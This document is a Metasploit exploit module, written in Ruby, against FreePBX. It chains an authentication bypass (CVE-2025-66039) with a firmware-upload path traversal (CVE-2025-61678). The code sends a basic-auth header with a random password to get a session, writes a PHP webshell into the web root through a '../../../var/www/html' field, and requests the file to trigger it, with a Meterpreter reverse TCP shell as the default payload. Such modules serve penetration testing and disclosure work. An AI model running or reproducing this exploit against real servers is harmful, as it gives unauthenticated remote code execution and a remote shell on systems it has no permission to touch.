FreePBX firmware file upload

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FreePBX firmware file upload',
        'Description' => %q{
          The FreePBX versions prior to 16.0.44,16.0.92 and 17.0.6,17.0.23 are vulnerable to multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61678, in the context of this module. The versions before 16.0.44 and 17.0.23 are vulnerable to CVE-2025-66039, while versions before 16.0.92 and 17.0.6 are vulnerable to CVE-2025-61678. The former represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user. The latter allows unrestricted file uploads via firmware upload, including path traversal. These vulnerabilities allow unauthenticated remote code execution by bypassing authentication and placing a webshell in the web server's directory.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Noah King',    # research
          'msutovsky-r7'  # module
        ],
        'References' => [
          [ 'CVE', '2025-66039'], # Authentication Bypass
          [ 'CVE', '2025-61678'], # File Upload and Path Traversal
          [ 'URL', 'https://horizon3.ai/attack-research/the-freepbx-rabbit-hole-cve-2025-66039-and-others/']
        ],
        'Platform' => ['php'],
        'Targets' => [
          [
            'PHP',
            {
              'Platform' => 'php',
              'Arch' => ARCH_PHP,
              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },
              'Type' => :php
            }
          ]
        ],
        'DisclosureDate' => '2025-12-11',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        OptString.new('USERNAME', [true, 'A valid FreePBX user']),
      ]
    )
  end

  def check
    res = send_request_cgi({
      'uri' => normalize_uri('admin', 'config.php'),
      'method' => 'GET'
    })

    if (res&.code == 401 && res.body.include?('FreePBX')) ||
       (res.code == 500)
      return CheckCode::Detected('The FreePBX with Webserver authentication mode detected')
    end

    CheckCode::Safe('Webserver authorization mode is not set')
  end

  def get_session_cookie
    res = send_request_cgi({
      'uri' => normalize_uri('admin', 'config.php'),
      'method' => 'GET',
      'headers' => { 'Authorization' => basic_auth(datastore['USERNAME'], Rex::Text.rand_text_alphanumeric(6)) },
      'keep_cookies' => true
    })

    fail_with(Failure::UnexpectedReply, 'Received unexpected reply') unless res&.code == 401

    fail_with(Failure::NotVulnerable, 'Target might not be vulnerable to authentication bypass') unless res.get_cookies
  end

  def upload_webshell
    @target_payload_file_name = %(#{Rex::Text.rand_text_alphanumeric(8).downcase}.php)
    @target_dir = Rex::Text.rand_text_alphanumeric(8).downcase

    form_data = Rex::MIME::Message.new

    form_data.add_part(SecureRandom.uuid, nil, nil, 'form-data; name="dzuuid"')
    form_data.add_part('0', nil, nil, 'form-data; name="dzchunkindex"')
    form_data.add_part(payload.encoded.length.to_s, nil, nil, 'form-data; name="dztotalfilesize"')
    form_data.add_part('2000000', nil, nil, 'form-data; name="dzchunksize"')
    form_data.add_part('1', nil, nil, 'form-data; name="dztotalchunkcount"')
    form_data.add_part('0', nil, nil, 'form-data; name="dzchunkbyteoffset"')
    form_data.add_part("../../../var/www/html/#{@target_dir}", nil, nil, 'form-data; name="fwbrand"')
    form_data.add_part('1', nil, nil, 'form-data; name="fwmodel"')
    form_data.add_part('1', nil, nil, 'form-data; name="fwversion"')
    form_data.add_part(payload.encoded, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{@target_payload_file_name}"))

    res = send_request_cgi({
      'uri' => normalize_uri('admin', 'ajax.php'),
      'method' => 'POST',
      'headers' => {
        'Authorization' => basic_auth(Rex::Text.rand_text_alphanumeric(6), Rex::Text.rand_text_alphanumeric(6)),
        'Referer' => full_uri(normalize_uri('admin', 'config.php'))
      },
      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
      'vars_get' => { 'module' => 'endpoint', 'command' => 'upload_cust_fw' },
      'data' => form_data.to_s
    })

    fail_with(Failure::PayloadFailed, 'Failed to upload webshell') unless res&.code == 500
    register_dir_for_cleanup("../#{@target_dir}")
  end

  def trigger_payload
    send_request_cgi({
      'uri' => normalize_uri(@target_dir, @target_payload_file_name),
      'method' => 'GET'
    })
  end

  def exploit
    print_status('Trying to bypass authentication...')
    get_session_cookie

    print_good('Bypass successful, trying upload webshell...')

    upload_webshell

    print_good('Upload successful, triggering...')

    trigger_payload
  end
end